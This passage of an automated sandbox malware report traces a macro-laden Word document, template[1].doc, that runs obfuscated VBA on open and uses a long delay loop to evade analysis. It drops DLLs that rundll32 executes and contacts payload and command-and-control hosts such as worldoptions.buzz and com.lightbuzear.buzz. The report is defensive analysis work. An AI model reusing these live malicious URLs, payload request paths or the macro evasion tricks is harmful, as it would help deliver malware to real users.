Source: rundll32.exe, 00000005.00000002.1198625904.000000000028B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1198764389.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1198775167.0000000002FED000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: rundll32.exe, 00000005.00000002.1198775167.0000000002FED000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: rundll32.exe, 00000005.00000002.1198764389.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: rundll32.exe, 00000005.00000002.1198764389.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: rundll32.exe, 00000005.00000002.1198764389.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: rundll32.exe, 00000005.00000002.1198625904.000000000028B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: rundll32.exe, 00000005.00000002.1198764389.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: rundll32.exe, 00000005.00000002.1198625904.000000000028B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1198764389.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: rundll32.exe, 00000005.00000002.1198625904.000000000028B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: rundll32.exe, 00000005.00000002.1198625904.000000000028B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1198764389.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1198775167.0000000002FED000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: rundll32.exe, 00000005.00000002.1198764389.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: rundll32.exe, 00000005.00000002.1198764389.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: rundll32.exe, 00000005.00000002.1198764389.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: rundll32.exe, 00000005.00000002.1198794640.000000000300F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://com.lightbuzear.buzz/
Source: rundll32.exe, 00000005.00000002.1198802455.000000000301C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1198775167.0000000002FED000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1198575987.0000000000215000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://com.lightbuzear.buzz/Kolpt523ytcserstrew/torel
Source: rundll32.exe, 00000005.00000002.1198775167.0000000002FED000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://com.lightbuzear.buzz/Kolpt523ytcserstrew/torel1ci
Source: rundll32.exe, 00000005.00000002.1198575987.0000000000215000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://com.lightbuzear.buzz/Kolpt523ytcserstrew/torelEu
Source: rundll32.exe, 00000005.00000002.1198625904.000000000028B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1198764389.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: rundll32.exe, 00000005.00000002.1198605277.0000000000250000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: unknown HTTP traffic detected:
  POST / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: www.Google.com
  Content-Length: 0
  Cache-Control: no-cache
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{6D74B366-D4C8-464E-A7CA-80C94D1A45EA}.tmp
Source: unknown DNS traffic detected: queries for: worldoptions.buzz
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000007FEF4737230 LoadLibraryExW,GetProcAddress,ObtainUserAgentString,FreeLibrary,InternetOpenA,InternetConnectA,InternetCloseHandle,LoadLibraryW,HttpOpenRequestA,InternetCloseHandle,InternetCloseHandle,GetProcAddress,GetProcAddress,HttpSendRequestA,GetLastError,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,FreeLibrary,CreateDirectoryW,FreeLibrary,std::ios_base::_Ios_base_dtor,GetModuleHandleA,GetProcAddress,InternetReadFile,wcsstr,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,FreeLibrary,std::ios_base::_Ios_base_dtor, 5_2_000007FEF4737230
Source: global traffic HTTP traffic detected:
  GET /agE7nqQLgssuVeUY/OGHAYZZFhfCtspqorBFNYMrxHN7TXIlz8vjv1TPmuyrc2yIu.png HTTP/1.1
  Accept: */*
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: worldoptions.buzz
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
  GET /agE7nqQLgssuVeUY/OGHAYZZFhfCtspqorBFNYMrxHN7TXIlz8vjv1TPmuyrc2yIu.mp4 HTTP/1.1
  Accept: */*
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: worldoptions.buzz
  Connection: Keep-Alive
Source: unknown HTTPS traffic detected: 142.250.185.228:443 -> 192.168.2.22:49172 version: TLS 1.2
Source: unknown HTTPS traffic detected: 64.52.80.180:443 -> 192.168.2.22:49175 version: TLS 1.2

System Summary

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\dnrdfsi11023.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\wnitmpo.dll
Source: template[1].doc OLE, VBA macro line: Private Declare PtrSafe Function IJIiLJIJlllJIjIJ Lib "kernel32" Alias "MultiByteToWideChar" (ByVal LilIilljllJjLjIl As Long, ByVal LiIJJjiLLILjLLiL As Long, ByVal IjJIjiljLjLLiIlI As LongPtr, ByVal ljLLLJJilJJlIJLJ As Long, ByVal iLLiLJiiLJijIjjL As LongPtr, ByVal jjIILJillJlIiIij As Long) As Long
Source: template[1].doc OLE, VBA macro line: Private Declare Function IJIiLJIJlllJIjIJ Lib "kernel32" Alias "MultiByteToWideChar" (ByVal LilIilljllJjLjIl As Long, ByVal LiIJJjiLLILjLLiL As Long, ByVal IjJIjiljLjLLiIlI As Long, ByVal ljLLLJJilJJlIJLJ As Long, ByVal iLLiLJiiLJijIjjL As Long, ByVal jjIILJillJlIiIij As Long) As Long
Source: ~DF3EAF6279D3B942E8.TMP.0.dr OLE, VBA macro line: Private Declare PtrSafe Function IJIiLJIJlllJIjIJ Lib "kernel32" Alias "MultiByteToWideChar" (ByVal LilIilljllJjLjIl As Long, ByVal LiIJJjiLLILjLLiL As Long, ByVal IjJIjiljLjLLiIlI As LongPtr, ByVal ljLLLJJilJJlIJLJ As Long, ByVal iLLiLJiiLJijIjjL As LongPtr, ByVal jjIILJillJlIiIij As Long) As Long
Source: ~DF3EAF6279D3B942E8.TMP.0.dr OLE, VBA macro line: Private Declare Function IJIiLJIJlllJIjIJ Lib "kernel32" Alias "MultiByteToWideChar"(ByVal LilIilljllJjLjIl as Long, ByVal LiIJJjiLLILjLLiL as Long, ByVal IjJIjiljLjLLiIlI as Long, ByVal ljLLLJJilJJlIJLJ as Long, ByVal iLLiLJiiLJijIjjL as Long, ByVal jjIILJillJlIiIij as Long) as Long
Source: ~DF3EAF6279D3B942E8.TMP.0.dr OLE, VBA macro line: JbxLog "win32:" & jbxline & ":IJIiLJIJlllJIjIJ" & ":kernel32!MultiByteToWideChar"
Source: C:\Windows\System32\rundll32.exe Code function: String function: 000007FEF47589A8 appears 48 times
Source: C:\Windows\System32\rundll32.exe Code function: String function: 000007FEF4722D50 appears 51 times
Source: template[1].doc OLE, VBA macro line: Sub DoCUmeNT_OPEn()
Source: VBA code instrumentation OLE, VBA macro: Module ThisDocument, Function DoCUmeNT_OPEn Name: DoCUmeNT_OPEn
Source: ~DF3EAF6279D3B942E8.TMP.0.dr OLE, VBA macro line: Sub DoCUmeNT_OPEn()
Source: ~DF3EAF6279D3B942E8.TMP.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~WRF{78D6FE31-C42D-4CC6-B0D1-824575AF05A9}.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: template[1].doc OLE indicator, VBA macros: true
Source: ~DF3EAF6279D3B942E8.TMP.0.dr OLE indicator, VBA macros: true
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\dnrdfsi11023.dll A2BE0FE4CAFBCA698873FADCA25970FE24DF6FD9C2F0DA1E2DEC6561A2C33177
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\wnitmpo.dll 0E209D2DE485637DF53C20C8425FF3F20AF6E04A46697D80F459EC6CD36C58B7
Source: template[1].doc Virustotal: Detection: 12%
Source: C:\Windows\System32\taskeng.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: unknown Process created: C:\Windows\System32\taskeng.exe taskeng.exe {42E32873-DCC3-405E-9458-A04BFDF9CD6F} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
Source: C:\Windows\System32\taskeng.exe Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe "C:\Users\user\AppData\Local\Temp\dnrdfsi11023.dll",Rdwmnjioffws
Source: C:\Windows\System32\taskeng.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{92BDB7E4-F28B-46A0-B551-45A52BDD5125}\InprocServer32
Source: template[1].LNK.0.dr LNK file: ..\..\..\..\..\Desktop\template[1].doc
Source: template[1].doc OLE indicator, Word Document stream: true
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$mplate[1].doc
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVR61BE.tmp
Source: classification engine Classification label: mal100.expl.evad.winDOC@4/13@3/3
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000007FEF4738F50 CoInitializeEx,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,CoUninitialize,SysAllocString,SysFreeString,SysAllocString,SysFreeString,CoUninitialize,SysFreeString,_time64,wcsftime,_com_util::ConvertStringToBSTR,SysFreeString,SysFreeString,GetWindowsDirectoryW,SysFreeString,SysFreeString,CoUninitialize,SysAllocString,VariantInit,VariantInit,SysFreeString,VariantClear,VariantClear,VariantClear,CoUninitialize, 5_2_000007FEF4738F50
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini
Source: template[1].doc OLE document summary: title field not present or empty
Source: ~DF3EAF6279D3B942E8.TMP.0.dr OLE document summary: title field not present or empty
Source: ~DF3EAF6279D3B942E8.TMP.0.dr OLE document summary: author field not present or empty
Source: ~DF3EAF6279D3B942E8.TMP.0.dr OLE document summary: edited time not present or 0
Source: ~WRF{78D6FE31-C42D-4CC6-B0D1-824575AF05A9}.tmp.0.dr OLE document summary: title field not present or empty
Source: ~WRF{78D6FE31-C42D-4CC6-B0D1-824575AF05A9}.tmp.0.dr OLE document summary: author field not present or empty
Source: ~WRF{78D6FE31-C42D-4CC6-B0D1-824575AF05A9}.tmp.0.dr OLE document summary: edited time not present or 0
Source: C:\Windows\System32\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: template[1].doc Initial sample: OLE summary totaledittime = 403197
Source: ~WRF{78D6FE31-C42D-4CC6-B0D1-824575AF05A9}.tmp.0.dr Initial sample: OLE indicators vbamacros = False

Data Obfuscation

Source: template[1].doc Stream path 'VBA/ThisDocument' : High number of string operations
Source: ~DF3EAF6279D3B942E8.TMP.0.dr Stream path 'VBA/ThisDocument' : High number of string operations
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000007FEF4738BC0 LoadLibraryW,GetProcAddress,FreeLibrary, 5_2_000007FEF4738BC0
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000007FEF474679C EncodePointer,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 5_2_000007FEF474679C
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: template[1].doc Stream path 'VBA/ThisDocument' : For i = 1 To 405306368 j = i Next i
Source: ~DF3EAF6279D3B942E8.TMP.0.dr Stream path 'VBA/ThisDocument' : For i = 1 To 405306368 j = i Next i For k
Source: C:\Windows\System32\rundll32.exe RDTSC instruction interceptor: First address: 000007FEF4734FAE second address: 000007FEF4734FBA instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec eax 0x0000000a mov ecx, eax 0x0000000c rdtsc
Source: C:\Windows\System32\taskeng.exe TID: 1688 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000007FEF4734F60 rdtsc 5_2_000007FEF4734F60
Source: C:\Windows\System32\rundll32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000007FEF4747F74 __crtCaptureCurrentContext,IsDebuggerPresent,__crtUnhandledException, 5_2_000007FEF4747F74
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000007FEF4754FD4 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 5_2_000007FEF4754FD4
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000007FEF4738BC0 LoadLibraryW,GetProcAddress,FreeLibrary, 5_2_000007FEF4738BC0
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000007FEF4747B38 GetProcessHeap, 5_2_000007FEF4747B38
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000007FEF47476B4 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 5_2_000007FEF47476B4

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\rundll32.exe Network Connect: 142.250.185.228 443
Source: C:\Windows\System32\rundll32.exe Domain query: com.lightbuzear.buzz
Source: C:\Windows\System32\rundll32.exe Network Connect: 64.52.80.180 443
Source: C:\Windows\System32\rundll32.exe Domain query: www.google.com
Source: C:\Windows\System32\taskeng.exe Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe "C:\Users\user\AppData\Local\Temp\dnrdfsi11023.dll",Rdwmnjioffws
Source: C:\Windows\System32\rundll32.exe Code function: _getptd,_getptd,LcidFromHexString,GetLocaleInfoW,TestDefaultLanguage, 5_2_000007FEF4750D20
Source: C:\Windows\System32\rundll32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 5_2_000007FEF4750E6C
Source: C:\Windows\System32\rundll32.exe Code function: _getptd,GetLocaleInfoW, 5_2_000007FEF4750F1C
Source: C:\Windows\System32\rundll32.exe Code function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoEx,_calloc_crt,__crtGetLocaleInfoEx,__crtGetLocaleInfoEx,_invoke_watson, 5_2_000007FEF4746ECC
Source: C:\Windows\System32\rundll32.exe Code function: _getptd,__crtGetLocaleInfoEx,__crtGetLocaleInfoEx,TestDefaultCountry,__crtGetLocaleInfoEx,TestDefaultCountry,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_getptd,__crtGetLocaleInfoEx,_invoke_watson, 5_2_000007FEF475000C
Source: C:\Windows\System32\rundll32.exe Code function: _getptd,_getptd,TranslateName,GetLcidFromLangCountry,GetLcidFromLanguage,TranslateName,GetLcidFromLangCountry,GetLcidFromLanguage,_getptd,EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,__crtDownlevelLCIDToLocaleName,__crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,_itow_s, 5_2_000007FEF4750FC4
Source: C:\Windows\System32\rundll32.exe Code function: _getptd,EnumSystemLocalesW, 5_2_000007FEF47509A8
Source: C:\Windows\System32\rundll32.exe Code function: _getptd,EnumSystemLocalesW, 5_2_000007FEF4750A5C
Source: C:\Windows\System32\rundll32.exe Code function: _getptd,_getptd,LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,TestDefaultLanguage, 5_2_000007FEF4750AF0
Source: C:\Windows\System32\rundll32.exe Code function: EnumSystemLocalesW, 5_2_000007FEF47514AC
Source: C:\Windows\System32\rundll32.exe Code function: __crtGetLocaleInfoEx,__crtGetLocaleInfoEx,GetACP, 5_2_000007FEF4750478
Source: C:\Windows\System32\rundll32.exe Code function: __crtGetLocaleInfoEx, 5_2_000007FEF475052C
Source: C:\Windows\System32\rundll32.exe Code function: __crtDownlevelLocaleNameToLCID,GetLocaleInfoW, 5_2_000007FEF475156C
Source: C:\Windows\System32\rundll32.exe Code function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,__crtGetLocaleInfoEx,__crtGetLocaleInfoEx,__crtGetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage,__crtGetUserDefaultLocaleName,_invoke_watson,_invoke_watson,_getptd,_getptd,LcidFromHexString,GetLocaleInfoW, 5_2_000007FEF4750630
Source: C:\Windows\System32\rundll32.exe Code function: _getptd,__lc_wcstolc,__get_qualified_locale_downlevel,__get_qualified_locale,__lc_lctowcs,__crtGetLocaleInfoEx,GetACP,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson, 5_2_000007FEF47456F4
Source: C:\Windows\System32\rundll32.exe Code function: __crtGetLocaleInfoEx,malloc,__crtGetLocaleInfoEx,WideCharToMultiByte, 5_2_000007FEF47520B0
Source: C:\Windows\System32\rundll32.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 5_2_000007FEF475221C
Source: C:\Windows\System32\taskeng.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000007FEF4743D80 GetSystemTimeAsFileTime, 5_2_000007FEF4743D80
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000007FEF4749218 _lock,_get_daylight,_get_daylight,_get_daylight,___lc_codepage_func,_malloc_crt,_invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson, 5_2_000007FEF4749218
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000007FEF4736150 GetUserNameW,GetComputerNameW, 5_2_000007FEF4736150